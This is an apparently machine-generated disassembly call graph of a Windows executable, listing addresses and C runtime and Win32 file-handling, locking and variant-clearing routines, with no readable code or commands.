_doexit 87160->87192 87161->87149 87164 41d23a 87163->87164 87165 41d255 87164->87165 87177 41d26c __wopenfile 87164->87177 87197 417f77 46 API calls __getptd_noexit 87165->87197 87167 41d421 87170 41d47a 87167->87170 87171 41d48c 87167->87171 87168 41d25a 87198 417f25 10 API calls _W_expandtime 87168->87198 87202 417f77 46 API calls __getptd_noexit 87170->87202 87194 422bf9 87171->87194 87174 41499d 87187 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87174->87187 87175 41d47f 87203 417f25 10 API calls _W_expandtime 87175->87203 87177->87167 87177->87170 87199 41341f 58 API calls 3 library calls 87177->87199 87179 41d41a 87179->87167 87200 41341f 58 API calls 3 library calls 87179->87200 87181 41d439 87181->87167 87201 41341f 58 API calls 3 library calls 87181->87201 87183->87131 87184->87144 87185->87144 87186->87144 87187->87144 87193 4181f2 LeaveCriticalSection 87188->87193 87190 41d602 87190->87153 87191->87160 87192->87160 87193->87190 87204 422b35 87194->87204 87196 422c14 87196->87174 87197->87168 87198->87174 87199->87179 87200->87181 87201->87167 87202->87175 87203->87174 87207 422b41 __mtinitlocknum 87204->87207 87205 422b54 87206 417f77 __mtinitlocknum 46 API calls 87205->87206 87208 422b59 87206->87208 87207->87205 87209 422b8a 87207->87209 87210 417f25 _W_expandtime 10 API calls 87208->87210 87211 422400 __tsopen_nolock 109 API calls 87209->87211 87214 422b63 __mtinitlocknum 87210->87214 87212 422ba4 87211->87212 87213 422bcb __wsopen_helper LeaveCriticalSection 87212->87213 87213->87214 87214->87196 87218 4150dd __mtinitlocknum 87215->87218 87216 4150e9 87246 417f77 46 API calls __getptd_noexit 87216->87246 87218->87216 87219 41510f 87218->87219 87228 415471 87219->87228 87220 4150ee 87247 417f25 10 API calls _W_expandtime 87220->87247 87227 4150f9 __mtinitlocknum 87227->87075 87229 415483 87228->87229 87230 4154a5 EnterCriticalSection 87228->87230 87229->87230 87232 41548b 87229->87232 87231 415117 87230->87231 87234 415047 87231->87234 87233 4182cb __lock 46 API calls 87232->87233 87233->87231 87235 415067 87234->87235 87236 415057 87234->87236 87241 415079 87235->87241 87249 414e4e 87235->87249 87304 417f77 46 API calls __getptd_noexit 87236->87304 87240 41505c 87248 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87240->87248 87266 41443c 87241->87266 87244 4150b9 87279 41e1f4 87244->87279 87246->87220 87247->87227 87248->87227 87250 414e61 87249->87250 87251 414e79 87249->87251 87305 417f77 46 API calls __getptd_noexit 87250->87305 87252 414139 __stbuf 46 API calls 87251->87252 87254 414e80 87252->87254 87257 41e1f4 __write 51 API calls 87254->87257 87255 414e66 87306 417f25 10 API calls _W_expandtime 87255->87306 87258 414e97 87257->87258 87259 414f09 87258->87259 87261 414ec9 87258->87261 87265 414e71 87258->87265 87307 417f77 46 API calls __getptd_noexit 87259->87307 87262 41e1f4 __write 51 API calls 87261->87262 87261->87265 87263 414f64 87262->87263 87264 41e1f4 __write 51 API calls 87263->87264 87263->87265 87264->87265 87265->87241 87267 414455 87266->87267 87271 414477 87266->87271 87268 414139 __stbuf 46 API calls 87267->87268 87267->87271 87269 414470 87268->87269 87308 41b7b2 77 API calls 6 library calls 87269->87308 87272 414139 87271->87272 87273 414145 87272->87273 87274 41415a 87272->87274 87309 417f77 46 API calls __getptd_noexit 87273->87309 87274->87244 87276 41414a 87310 417f25 10 API calls _W_expandtime 87276->87310 87278 414155 87278->87244 87280 41e200 __mtinitlocknum 87279->87280 87281 41e223 87280->87281 87282 41e208 87280->87282 87284 41e22f 87281->87284 87287 41e269 87281->87287 87331 417f8a 46 API calls __getptd_noexit 87282->87331 87333 417f8a 46 API calls __getptd_noexit 87284->87333 87285 41e20d 87332 417f77 46 API calls __getptd_noexit 87285->87332 87311 41ae56 87287->87311 87289 41e234 87334 417f77 46 API calls __getptd_noexit 87289->87334 87292 41e26f 87294 41e291 87292->87294 87295 41e27d 87292->87295 87293 41e23c 87335 417f25 10 API calls _W_expandtime 87293->87335 87336 417f77 46 API calls __getptd_noexit 87294->87336 87321 41e17f 87295->87321 87299 41e215 __mtinitlocknum 87299->87240 87300 41e289 87338 41e2c0 LeaveCriticalSection __unlock_fhandle 87300->87338 87301 41e296 87337 417f8a 46 API calls __getptd_noexit 87301->87337 87304->87240 87305->87255 87306->87265 87307->87265 87308->87271 87309->87276 87310->87278 87312 41ae62 __mtinitlocknum 87311->87312 87313 41aebc 87312->87313 87314 4182cb __lock 46 API calls 87312->87314 87315 41aec1 EnterCriticalSection 87313->87315 87316 41aede __mtinitlocknum 87313->87316 87317 41ae8e 87314->87317 87315->87316 87316->87292 87318 41aeaa 87317->87318 87319 41ae97 InitializeCriticalSectionAndSpinCount 87317->87319 87320 41aeec ___lock_fhandle LeaveCriticalSection 87318->87320 87319->87318 87320->87313 87322 41aded __chsize_nolock 46 API calls 87321->87322 87323 41e18e 87322->87323 87324 41e1a4 SetFilePointer 87323->87324 87325 41e194 87323->87325 87326 41e1bb GetLastError 87324->87326 87328 41e1c3 87324->87328 87327 417f77 __mtinitlocknum 46 API calls 87325->87327 87326->87328 87329 41e199 87327->87329 87328->87329 87330 417f9d __dosmaperr 46 API calls 87328->87330 87329->87300 87330->87329 87331->87285 87332->87299 87333->87289 87334->87293 87335->87299 87336->87301 87337->87300 87338->87299 87340 4149ea 87339->87340 87341 4149fe 87339->87341 87385 417f77 46 API calls __getptd_noexit 87340->87385 87343 4149fa 87341->87343 87345 41443c __flush 77 API calls 87341->87345 87357 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87343->87357 87344 4149ef 87386 417f25 10 API calls _W_expandtime 87344->87386 87346 414a0a 87345->87346 87358 41d8c2 87346->87358 87350 414139 __stbuf 46 API calls 87351 414a18 87350->87351 87362 41d7fe 87351->87362 87353 414a1e 87353->87343 87354 413748 _free 46 API calls 87353->87354 87354->87343 87355->87086 87356->87090 87357->87090 87359 414a12 87358->87359 87360 41d8d2 87358->87360 87359->87350 87360->87359 87361 413748 _free 46 API calls 87360->87361 87361->87359 87363 41d80a __mtinitlocknum 87362->87363 87364 41d812 87363->87364 87365 41d82d 87363->87365 87402 417f8a 46 API calls __getptd_noexit 87364->87402 87367 41d839 87365->87367 87370 41d873 87365->87370 87404 417f8a 46 API calls __getptd_noexit 87367->87404 87368 41d817 87403 417f77 46 API calls __getptd_noexit 87368->87403 87373 41ae56 ___lock_fhandle 48 API calls 87370->87373 87372 41d83e 87405 417f77 46 API calls __getptd_noexit 87372->87405 87376 41d879 87373->87376 87374 41d81f __mtinitlocknum 87374->87353 87379 41d893 87376->87379 87380 41d887 87376->87380 87377 41d846 87406 417f25 10 API calls _W_expandtime 87377->87406 87407 417f77 46 API calls __getptd_noexit 87379->87407 87387 41d762 87380->87387 87383 41d88d 87408 41d8ba LeaveCriticalSection __unlock_fhandle 87383->87408 87385->87344 87386->87343 87409 41aded 87387->87409 87389 41d7c8 87422 41ad67 47 API calls 2 library calls 87389->87422 87391 41d772 87391->87389 87392 41d7a6 87391->87392 87395 41aded __chsize_nolock 46 API calls 87391->87395 87392->87389 87393 41aded __chsize_nolock 46 API calls 87392->87393 87396 41d7b2 CloseHandle 87393->87396 87394 41d7d0 87397 41d7f2 87394->87397 87423 417f9d 46 API calls 3 library calls 87394->87423 87398 41d79d 87395->87398 87396->87389 87399 41d7be GetLastError 87396->87399 87397->87383 87401 41aded __chsize_nolock 46 API calls 87398->87401 87399->87389 87401->87392 87402->87368 87403->87374 87404->87372 87405->87377 87406->87374 87407->87383 87408->87374 87410 41ae12 87409->87410 87411 41adfa 87409->87411 87413 417f8a __read_nolock 46 API calls 87410->87413 87416 41ae51 87410->87416 87412 417f8a __read_nolock 46 API calls 87411->87412 87414 41adff 87412->87414 87415 41ae23 87413->87415 87417 417f77 __mtinitlocknum 46 API calls 87414->87417 87418 417f77 __mtinitlocknum 46 API calls 87415->87418 87416->87391 87419 41ae07 87417->87419 87420 41ae2b 87418->87420 87419->87391 87421 417f25 _W_expandtime 10 API calls 87420->87421 87421->87419 87422->87394 87423->87397 87425 414c82 __mtinitlocknum 87424->87425 87426 414cc3 87425->87426 87427 414cbb __mtinitlocknum 87425->87427 87433 414c96 setSBUpLow 87425->87433 87428 415471 __lock_file 47 API calls 87426->87428 87427->87095 87430 414ccb 87428->87430 87437 414aba 87430->87437 87431 414cb0 87452 417f25 10 API calls _W_expandtime 87431->87452 87451 417f77 46 API calls __getptd_noexit 87433->87451 87438 414af2 87437->87438 87442 414ad8 setSBUpLow 87437->87442 87453 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87438->87453 87439 414ae2 87504 417f77 46 API calls __getptd_noexit 87439->87504 87441 414b2d 87441->87438 87445 414c38 setSBUpLow 87441->87445 87447 414139 __stbuf 46 API calls 87441->87447 87454 41dfcc 87441->87454 87484 41d8f3 87441->87484 87506 41e0c2 46 API calls 4 library calls 87441->87506 87442->87438 87442->87439 87442->87441 87507 417f77 46 API calls __getptd_noexit 87445->87507 87447->87441 87449 414ae7 87505 417f25 10 API calls _W_expandtime 87449->87505 87451->87431 87452->87427 87453->87427 87455 41dfd8 __mtinitlocknum 87454->87455 87456 41dfe0 87455->87456 87457 41dffb 87455->87457 87577 417f8a 46 API calls __getptd_noexit 87456->87577 87458 41e007 87457->87458 87464 41e041 87457->87464 87579 417f8a 46 API calls __getptd_noexit 87458->87579 87461 41dfe5 87578 417f77 46 API calls __getptd_noexit 87461->87578 87463 41e00c 87580 417f77 46 API calls __getptd_noexit 87463->87580 87466 41e063 87464->87466 87467 41e04e 87464->87467 87469 41ae56 ___lock_fhandle 48 API calls 87466->87469 87582 417f8a 46 API calls __getptd_noexit 87467->87582 87472 41e069 87469->87472 87470 41e014 87581 417f25 10 API calls _W_expandtime 87470->87581 87471 41e053 87583 417f77 46 API calls __getptd_noexit 87471->87583 87475 41e077 87472->87475 87476 41e08b 87472->87476 87474 41dfed __mtinitlocknum 87474->87441 87508 41da15 87475->87508 87584 417f77 46 API calls __getptd_noexit 87476->87584 87480 41e083 87586 41e0ba LeaveCriticalSection __unlock_fhandle 87480->87586 87481 41e090 87585 417f8a 46 API calls __getptd_noexit 87481->87585 87485 41d900 87484->87485 87488 41d915 87484->87488 87590 417f77 46 API calls __getptd_noexit 87485->87590 87487 41d905 87591 417f25 10 API calls _W_expandtime 87487->87591 87490 41d94a 87488->87490 87495 41d910 87488->87495 87587 420603 87488->87587 87492 414139 __stbuf 46 API calls 87490->87492 87493 41d95e 87492->87493 87494 41dfcc __read 59 API calls 87493->87494 87496 41d965 87494->87496 87495->87441 87496->87495 87497 414139 __stbuf 46 API calls 87496->87497 87498 41d988 87497->87498 87498->87495 87499 414139 __stbuf 46 API calls 87498->87499 87500 41d994 87499->87500 87500->87495 87501 414139 __stbuf 46 API calls 87500->87501 87502 41d9a1 87501->87502 87503 414139 __stbuf 46 API calls 87502->87503 87503->87495 87504->87449 87505->87438 87506->87441 87507->87449 87509 41da31 87508->87509 87510 41da4c 87508->87510 87512 417f8a __read_nolock 46 API calls 87509->87512 87511 41da5b 87510->87511 87513 41da7a 87510->87513 87514 417f8a __read_nolock 46 API calls 87511->87514 87515 41da36 87512->87515 87517 41da98 87513->87517 87528 41daac 87513->87528 87516 41da60 87514->87516 87518 417f77 __mtinitlocknum 46 API calls 87515->87518 87519 417f77 __mtinitlocknum 46 API calls 87516->87519 87520 417f8a __read_nolock 46 API calls 87517->87520 87529 41da3e 87518->87529 87522 41da67 87519->87522 87524 41da9d 87520->87524 87521 41db02 87523 417f8a __read_nolock 46 API calls 87521->87523 87525 417f25 _W_expandtime 10 API calls 87522->87525 87526 41db07 87523->87526 87527 417f77 __mtinitlocknum 46 API calls 87524->87527 87525->87529 87530 417f77 __mtinitlocknum 46 API calls 87526->87530 87531 41daa4 87527->87531 87528->87521 87528->87529 87532 41dae1 87528->87532 87533 41db1b 87528->87533 87529->87480 87530->87531 87534 417f25 _W_expandtime 10 API calls 87531->87534 87532->87521 87537 41daec ReadFile 87532->87537 87535 416b04 __malloc_crt 46 API calls 87533->87535 87534->87529 87538 41db31 87535->87538 87539 41dc17 87537->87539 87540 41df8f GetLastError 87537->87540 87543 41db59 87538->87543 87544 41db3b 87538->87544 87539->87540 87547 41dc2b 87539->87547 87541 41de16 87540->87541 87542 41df9c 87540->87542 87551 417f9d __dosmaperr 46 API calls 87541->87551 87556 41dd9b 87541->87556 87545 417f77 __mtinitlocknum 46 API calls 87542->87545 87548 420494 __lseeki64_nolock 48 API calls 87543->87548 87546 417f77 __mtinitlocknum 46 API calls 87544->87546 87549 41dfa1 87545->87549 87550 41db40 87546->87550 87547->87556 87557 41dc47 87547->87557 87560 41de5b 87547->87560 87552 41db67 87548->87552 87553 417f8a __read_nolock 46 API calls 87549->87553 87554 417f8a __read_nolock 46 API calls 87550->87554 87551->87556 87552->87537 87553->87556 87554->87529 87555 413748 _free 46 API calls 87555->87529 87556->87529 87556->87555 87558 41dcab ReadFile 87557->87558 87565 41dd28 87557->87565 87562 41dcc9 GetLastError 87558->87562 87568 41dcd3 87558->87568 87559 41ded0 ReadFile 87563 41deef GetLastError 87559->87563 87569 41def9 87559->87569 87560->87556 87560->87559 87561 41ddec MultiByteToWideChar 87561->87556 87564 41de10 GetLastError 87561->87564 87562->87557 87562->87568 87563->87560 87563->87569 87564->87541 87565->87556 87566 41dda3 87565->87566 87567 41dd96 87565->87567 87573 41dd60 87565->87573 87566->87573 87574 41ddda 87566->87574 87570 417f77 __mtinitlocknum 46 API calls 87567->87570 87568->87557 87571 420494 __lseeki64_nolock 48 API calls 87568->87571 87569->87560 87572 420494 __lseeki64_nolock 48 API calls 87569->87572 87570->87556 87571->87568 87572->87569 87573->87561 87575 420494 __lseeki64_nolock 48 API calls 87574->87575 87576 41dde9 87575->87576 87576->87561 87577->87461 87578->87474 87579->87463 87580->87470 87581->87474 87582->87471 87583->87470 87584->87481 87585->87480 87586->87474 87588 416b04 __malloc_crt 46 API calls 87587->87588 87589 420618 87588->87589 87589->87490 87590->87487 87591->87495 87595 4148b3 GetSystemTimeAsFileTime __aulldiv 87592->87595 87594 442c6b 87594->87098 87595->87594 87596->87106 87597->87110 87598->87110 87604 45272f __tzset_nolock _wcscpy 87599->87604 87600 414d04 61 API calls __fread_nolock 87600->87604 87601 44afef GetSystemTimeAsFileTime 87601->87604 87602 4528a4 87602->87020 87602->87021 87603 4150d1 81 API calls _fseek 87603->87604 87604->87600 87604->87601 87604->87602 87604->87603 87606 44b1bc 87605->87606 87607 44b1ca 87605->87607 87608 4149c2 116 API calls 87606->87608 87609 44b1e1 87607->87609 87610 4149c2 116 API calls 87607->87610 87611 44b1d8 87607->87611 87608->87607 87640 4321a4 87609->87640 87612 44b2db 87610->87612 87611->87047 87612->87609 87615 44b2e9 87612->87615 87614 44b224 87616 44b253 87614->87616 87617 44b228 87614->87617 87618 44b2f6 87615->87618 87620 414a46 __fcloseall 82 API calls 87615->87620 87644 43213d 87616->87644 87619 44b235 87617->87619 87622 414a46 __fcloseall 82 API calls 87617->87622 87618->87047 87623 44b245 87619->87623 87625 414a46 __fcloseall 82 API calls 87619->87625 87620->87618 87622->87619 87623->87047 87624 44b25a 87626 44b260 87624->87626 87627 44b289 87624->87627 87625->87623 87629 44b26d 87626->87629 87632 414a46 __fcloseall 82 API calls 87626->87632 87654 44b0bf 87 API calls 87627->87654 87630 44b27d 87629->87630 87633 414a46 __fcloseall 82 API calls 87629->87633 87630->87047 87631 44b28f 87655 4320f8 46 API calls _free 87631->87655 87632->87629 87633->87630 87635 44b2a2 87638 44b2b2 87635->87638 87639 414a46 __fcloseall 82 API calls 87635->87639 87636 44b295 87636->87635 87637 414a46 __fcloseall 82 API calls 87636->87637 87637->87635 87638->87047 87639->87638 87641 4321b4 __tzset_nolock _memmove 87640->87641 87642 4321cb 87640->87642 87641->87614 87643 414d04 __fread_nolock 61 API calls 87642->87643 87643->87641 87645 4135bb _malloc 46 API calls 87644->87645 87646 432150 87645->87646 87647 4135bb _malloc 46 API calls 87646->87647 87648 432162 87647->87648 87649 4135bb _malloc 46 API calls 87648->87649 87650 432174 87649->87650 87652 432189 87650->87652 87656 4320f8 46 API calls _free 87650->87656 87652->87624 87653 432198 87653->87624 87654->87631 87655->87636 87656->87653 87657->86951 87658->86953 87659->86968 87660->86968 87661->86968 87662->86962 87663->86968 87664->86968 87665->86976 87666->86985 87667->86984 87668->86984 87718 410160 87669->87718 87671 41012f GetFullPathNameW 87672 410147 ctype 87671->87672 87672->86805 87674 4102cb SHGetDesktopFolder 87673->87674 87677 410333 _wcsncpy 87673->87677 87675 4102e0 _wcsncpy 87674->87675 87674->87677 87676 41031c SHGetPathFromIDListW 87675->87676 87675->87677 87676->87677 87677->86809 87679 4101bb 87678->87679 87683 425f4a 87678->87683 87680 410160 52 API calls 87679->87680 87681 4101c7 87680->87681 87722 410200 52 API calls 2 library calls 87681->87722 87682 4114ab __wcsicoll 58 API calls 87682->87683 87683->87682 87685 425f6e 87683->87685 87685->86811 87686 4101d6 87723 410200 52 API calls 2 library calls 87686->87723 87688 4101e9 87688->86811 87690 40f760 128 API calls 87689->87690 87691 40f584 87690->87691 87692 429335 87691->87692 87693 40f58c 87691->87693 87694 4528bd 118 API calls 87692->87694 87695 40f598 87693->87695 87696 429358 87693->87696 87697 42934b 87694->87697 87748 4033c0 113 API calls 7 library calls 87695->87748 87749 434034 86 API calls _wprintf 87696->87749 87701 429373 87697->87701 87702 42934f 87697->87702 87700 40f5b4 87700->86808 87705 4115d7 52 API calls 87701->87705 87704 431e58 82 API calls 87702->87704 87703 429369 87703->87701 87704->87696 87717 4293c5 ctype 87705->87717 87706 42959c 87707 413748 _free 46 API calls 87706->87707 87708 4295a5 87707->87708 87709 431e58 82 API calls 87708->87709 87710 4295b1 87709->87710 87714 401b10 52 API calls 87714->87717 87717->87706 87717->87714 87724 444af8 87717->87724 87727 44b41c 87717->87727 87734 402780 87717->87734 87742 4022d0 87717->87742 87750 44c7dd 64 API calls 3 library calls 87717->87750 87719 410167 _wcslen 87718->87719 87720 4115d7 52 API calls 87719->87720 87721 41017e _wcscpy 87720->87721 87721->87671 87722->87686 87723->87688 87725 4115d7 52 API calls 87724->87725 87726 444b27 _memmove 87725->87726 87726->87717 87728 44b429 87727->87728 87729 4115d7 52 API calls 87728->87729 87730 44b440 87729->87730 87731 44b45e 87730->87731 87732 401b10 52 API calls 87730->87732 87731->87717 87733 44b453 87732->87733 87733->87717 87735 402827 87734->87735 87738 402790 ctype _memmove 87734->87738 87737 4115d7 52 API calls 87735->87737 87736 4115d7 52 API calls 87739 402797 87736->87739 87737->87738 87738->87736 87740 4027bd 87739->87740 87741 4115d7 52 API calls 87739->87741 87740->87717 87741->87740 87743 4022e0 87742->87743 87745 40239d 87742->87745 87744 4115d7 52 API calls 87743->87744 87743->87745 87746 402320 ctype 87743->87746 87744->87746 87745->87717 87746->87745 87747 4115d7 52 API calls 87746->87747 87747->87746 87748->87700 87749->87703 87750->87717 87752 402417 87751->87752 87756 402539 ctype 87751->87756 87753 4115d7 52 API calls 87752->87753 87752->87756 87754 402443 87753->87754 87755 4115d7 52 API calls 87754->87755 87758 4024b4 87755->87758 87756->86815 87758->87756 87759 4022d0 52 API calls 87758->87759 87780 402880 95 API calls 2 library calls 87758->87780 87759->87758 87764 401566 87760->87764 87761 401794 87781 40e9a0 90 API calls 87761->87781 87764->87761 87765 4010a0 52 API calls 87764->87765 87766 40167a 87764->87766 87765->87764 87767 4017c0 87766->87767 87782 45e737 90 API calls 3 library calls 87766->87782 87767->86817 87769 40bc70 52 API calls 87768->87769 87778 40d451 87769->87778 87770 40d50f 87785 410600 52 API calls 87770->87785 87772 427c01 87786 45e737 90 API calls 3 library calls 87772->87786 87773 40e0a0 52 API calls 87773->87778 87775 401b10 52 API calls 87775->87778 87776 40d519 87776->86820 87778->87770 87778->87772 87778->87773 87778->87775 87778->87776 87783 40f310 53 API calls 87778->87783 87784 40d860 91 API calls 87778->87784 87780->87758 87781->87766 87782->87767 87783->87778 87784->87778 87785->87776 87786->87776 87787->86833 87788->86834 87790 42c5fe 87789->87790 87842 4091c6 87789->87842 87791 40bc70 52 API calls 87790->87791 87790->87842 87792 42c64e InterlockedIncrement 87791->87792 87793 42c665 87792->87793 87798 42c697 87792->87798 87795 42c672 InterlockedDecrement Sleep InterlockedIncrement 87793->87795 87793->87798 87794 42c737 InterlockedDecrement 87796 42c74a 87794->87796 87795->87793 87795->87798 87799 408f40 VariantClear 87796->87799 87797 42c731 87797->87794 87798->87794 87798->87797 88073 408e80 87798->88073 87801 42c752 87799->87801 88082 410c60 VariantClear ctype 87801->88082 87802 42c6cf 88077 45340c 85 API calls 87802->88077 87805 42c6db 87806 402160 52 API calls 87805->87806 87807 42c6e5 87806->87807 88078 45340c 85 API calls 87807->88078 87809 42c6f1 88079 40d200 52 API calls 2 library calls 87809->88079 87811 42c6fb 88080 465124 53 API calls 87811->88080 87813 42c715 87814 42c76a 87813->87814 87815 42c719 87813->87815 87816 401b10 52 API calls 87814->87816 88081 46fe32 VariantClear 87815->88081 87818 42c77e 87816->87818 87819 401980 53 API calls 87818->87819 87825 42c796 87819->87825 87820 42c812 88084 46fe32 VariantClear 87820->88084 87822 42c82a InterlockedDecrement 88085 46ff07 54 API calls 87822->88085 87824 42c864 88086 45e737 90 API calls 3 library calls 87824->88086 87825->87820 87825->87824 88083 40ba10 52 API calls 2 library calls 87825->88083 87828 42c9ec 88129 47d33e 329 API calls 87828->88129 87830 42c9fe 88130 46feb1 VariantClear VariantClear 87830->88130 87832 42ca08 87834 401b10 52 API calls 87832->87834 87833 408f40 VariantClear 87843 42c849 87833->87843 87837 42ca15 87834->87837 87835 408f40 VariantClear 87838 42c891 87835->87838 87836 402780 52 API calls 87836->87843 87839 40c2c0 52 API calls 87837->87839 88087 410c60 VariantClear ctype 87838->88087 87844 42c874 87839->87844 87841 401980 53 API calls 87841->87843 87842->86893 87843->87828 87843->87833 87843->87836 87843->87841 88088 40a780 87843->88088 87844->87835 87846 42ca59 87844->87846 87846->87846 87848 40afc4 87847->87848 87849 40b156 87847->87849 87850 40afd5 87848->87850 87851 42d1e3 87848->87851 88140 45e737 90 API calls 3 library calls 87849->88140 87854 40a780 192 API calls 87850->87854 87872 40b11a ctype 87850->87872 88141 45e737 90 API calls 3 library calls 87851->88141 87856 40b00a 87854->87856 87855 42d1f8 87859 408f40 VariantClear 87855->87859 87856->87855 87864 40b012 87856->87864 87858 42d4db 87858->87858 87860 40b143 87859->87860 87860->86893 87861 40b04a 87871 40b05c ctype 87861->87871 88142 40e270 VariantClear ctype 87861->88142 87862 40b094 ctype 87863 40b108 87862->87863 87868 42d425 ctype 87862->87868 87863->87872 88143 40e270 VariantClear ctype 87863->88143 87864->87861 87864->87862 87865 42d231 VariantClear 87864->87865 87865->87871 87866 42d45a VariantClear 87866->87872 87868->87866 87868->87872 87869 4115d7 52 API calls 87869->87862 87871->87862 87871->87869 87872->87860 88144 45e737 90 API calls 3 library calls 87872->88144 87874 40900d 87873->87874 87875 408fff 87873->87875 87878 42c3f6 87874->87878 87880 40a780 192 API calls 87874->87880 87881 42c44a 87874->87881 87883 42c47b 87874->87883 87885 42c4cb 87874->87885 87886 42c564 87874->87886 87889 42c548 87874->87889 87893 409112 87874->87893 87894 42c528 87874->87894 87896 4090df 87874->87896 87901 4090ea 87874->87901 87907 4090f2 ctype 87874->87907 88147 4534e3 52 API calls 87874->88147 88149 40c4e0 192 API calls 87874->88149 88145 403ea0 52 API calls __cinit 87875->88145 88148 45e737 90 API calls 3 library calls 87878->88148 87880->87874 88150 45e737 90 API calls 3 library calls 87881->88150 88151 451b42 61 API calls 87883->88151 88153 47faae 231 API calls 87885->88153 87890 408f40 VariantClear 87886->87890 88156 45e737 90 API calls 3 library calls 87889->88156 87890->87907 87891 42c491 87891->87907 88152 45e737 90 API calls 3 library calls 87891->88152 87892 42c4da 87892->87907 88154 45e737 90 API calls 3 library calls 87892->88154 87893->87889 87899 40912b 87893->87899 88155 45e737 90 API calls 3 library calls 87894->88155 87896->87901 87902 408e80 VariantClear 87896->87902 87899->87907 88146 403e10 53 API calls 87899->88146 87903 408f40 VariantClear 87901->87903 87902->87901 87903->87907 87905 40914b 87906 408f40 VariantClear 87905->87906 87906->87907 87907->86893 88157 408d90 87908->88157 87910 429778 88186 410c60 VariantClear ctype 87910->88186 87912 429780 87913 408cf9 87913->87910 87914 42976c 87913->87914 87916 408d2d 87913->87916 88185 45e737 90 API calls 3 library calls 87914->88185 88173 403d10 87916->88173 87919 408d45 ctype 87920 408d71 ctype 87919->87920 87921 408f40 VariantClear 87919->87921 87920->86893 87921->87919 87923 4096c6 _wcslen 87922->87923 87924 40a70c ctype _memmove 87923->87924 87925 4115d7 52 API calls 87923->87925 87927 4013a0 52 API calls 87924->87927 87926 4096fa _memmove 87925->87926 87928 4115d7 52 API calls 87926->87928 87929 4297aa 87927->87929 87930 40971b 87928->87930 87932 4115d7 52 API calls 87929->87932 87930->87924 87931 409749 CharUpperBuffW 87930->87931 87935 40976a ctype 87930->87935 87931->87935 87934 4297d1 _memmove 87932->87934 88490 45e737 90 API calls 3 library calls 87934->88490 87942 4097e5 ctype 87935->87942 88464 47dcbb 194 API calls 87935->88464 87937 408f40 VariantClear 87938 42ae92 87937->87938 88491 410c60 VariantClear ctype 87938->88491 87940 42aea4 87941 409aa2 87941->87934 87944 4115d7 52 API calls 87941->87944 87947 409afe 87941->87947 87942->87934 87942->87941 87943 40a689 87942->87943 87946 40c2c0 52 API calls 87942->87946 87950 40a6af ctype _memmove 87942->87950 87953 429a46 VariantClear 87942->87953 87958 408f40 VariantClear 87942->87958 87964 4115d7 52 API calls 87942->87964 87975 4299d9 87942->87975 87978 429abd 87942->87978 87987 40a780 192 API calls 87942->87987 87991 42a452 87942->87991 88465 40c4e0 192 API calls 87942->88465 88467 40ba10 52 API calls 2 library calls 87942->88467 88468 40e270 VariantClear ctype 87942->88468 87945 4115d7 52 API calls 87943->87945 87944->87947 87945->87950 87946->87942 87948 409b2a 87947->87948 87949 4115d7 52 API calls 87947->87949 87951 429dbe 87948->87951 88009 409b4d ctype _memmove 87948->88009 88472 40b400 VariantClear VariantClear ctype 87948->88472 87952 429d31 87949->87952 87969 4115d7 52 API calls 87950->87969 87960 429dd3 87951->87960 88473 40b400 VariantClear VariantClear ctype 87951->88473 87962 429d42 87952->87962 88469 44a801 52 API calls 87952->88469 87953->87942 87956 40a045 87963 4115d7 52 API calls 87956->87963 87957 42a3f5 88477 47390f VariantClear 87957->88477 87958->87942 87960->88009 88474 40e1c0 VariantClear ctype 87960->88474 87966 40e0a0 52 API calls 87962->87966 87970 40a04c 87963->87970 87964->87942 87971 429d57 87966->87971 87969->87924 87974 40a0a7 87970->87974 87977 4091e0 315 API calls 87970->87977 88470 453443 52 API calls 87971->88470 87973 42a42f 88478 45e737 90 API calls 3 library calls 87973->88478 87995 40a0af 87974->87995 88479 40c790 VariantClear ctype 87974->88479 87979 408f40 VariantClear 87975->87979 87977->87974 87978->86893 87982 4299e2 87979->87982 87980 429d88 88471 453443 52 API calls 87980->88471 88466 410c60 VariantClear ctype 87982->88466 87987->87942 87988 402780 52 API calls 87988->88009 87989 44a801 52 API calls 87989->88009 87991->87937 87992 408f40 VariantClear 88021 40a162 ctype _memmove 87992->88021 87993 41130a 51 API calls __cinit 87993->88009 87994 4115d7 52 API calls 87994->88009 87996 40a11b 87995->87996 87998 42a4b4 VariantClear 87995->87998 87995->88021 88003 40a12d ctype 87996->88003 88480 40e270 VariantClear ctype 87996->88480 87997 40a780 192 API calls 87997->88009 87998->88003 87999 401980 53 API calls 87999->88009 88000 408e80 VariantClear 88000->88009 88002 4115d7 52 API calls 88002->88021 88003->88002 88003->88021 88004 408e80 VariantClear 88004->88021 88006 42a74d VariantClear 88006->88021 88007 40a368 88010 42aad4 88007->88010 88017 40a397 88007->88017 88008 40e270 VariantClear 88008->88021 88009->87924 88009->87957 88009->87973 88009->87988 88009->87989 88009->87993 88009->87994 88009->87997 88009->87999 88009->88000 88011 409fd2 88009->88011 88015 409c95 88009->88015 88475 45f508 52 API calls 88009->88475 88476 403e10 53 API calls 88009->88476 88483 46fe90 VariantClear VariantClear ctype 88010->88483 88011->87956 88011->87957 88012 42a7e4 VariantClear 88012->88021 88013 42a886 VariantClear 88013->88021 88015->86893 88016 40a3ce 88029 40a3d9 ctype 88016->88029 88484 40b400 VariantClear VariantClear ctype 88016->88484 88017->88016 88042 40a42c ctype 88017->88042 88463 40b400 VariantClear VariantClear ctype 88017->88463 88020 42abaf 88024 42abd4 VariantClear 88020->88024 88036 40a4ee ctype 88020->88036 88021->87992 88021->88004 88021->88006 88021->88007 88021->88008 88021->88010 88021->88012 88021->88013 88023 4115d7 52 API calls 88021->88023 88026 4115d7 52 API calls 88021->88026 88481 470870 52 API calls 88021->88481 88482 44ccf1 VariantClear ctype 88021->88482 88022 40a4dc 88022->88036 88486 40e270 VariantClear ctype 88022->88486 88025 42a5a6 VariantInit VariantCopy 88023->88025 88024->88036 88025->88021 88031 42a5c6 VariantClear 88025->88031 88026->88021 88027 42ac4f 88035 42ac79 VariantClear 88027->88035 88040 40a546 ctype 88027->88040 88030 40a41a 88029->88030 88033 42ab44 VariantClear 88029->88033 88029->88042 88030->88042 88485 40e270 VariantClear ctype 88030->88485 88031->88021 88032 40a534 88032->88040 88487 40e270 VariantClear ctype 88032->88487 88033->88042 88035->88040 88036->88027 88036->88032 88037 42ad28 88043 42ad4e VariantClear 88037->88043 88048 40a583 ctype 88037->88048 88040->88037 88041 40a571 88040->88041 88041->88048 88488 40e270 VariantClear ctype 88041->88488 88042->88020 88042->88022 88043->88048 88045 40a650 ctype 